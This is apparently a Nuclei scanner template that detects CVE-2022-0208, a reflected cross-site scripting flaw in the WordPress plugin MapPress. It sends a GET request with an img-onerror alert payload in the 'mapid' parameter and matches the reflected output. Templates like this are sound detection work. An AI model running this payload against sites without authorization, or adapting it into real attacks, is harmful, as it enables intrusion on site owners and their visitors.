53 lines
1.7 KiB
YAML
53 lines
1.7 KiB
YAML
id: CVE-2022-0208
|
|
|
|
info:
|
|
name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting.
|
|
remediation: |
|
|
Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0208
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-0208
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00106
|
|
epss-percentile: 0.43063
|
|
cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: mappresspro
|
|
product: mappress
|
|
framework: wordpress
|
|
tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<img src onerror=alert(document.domain)>"
|
|
- "Bad mapid"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502202d0931190e0c03e7f1eca1cc100a1c06a89b1bcd7f2d674089005e60c4fecc22022100b60acdb6611d2ebc8eda6746c03144cec734ebdf42a3677e7569705410706c29:922c64590222798bb761d5b6d8e72950
|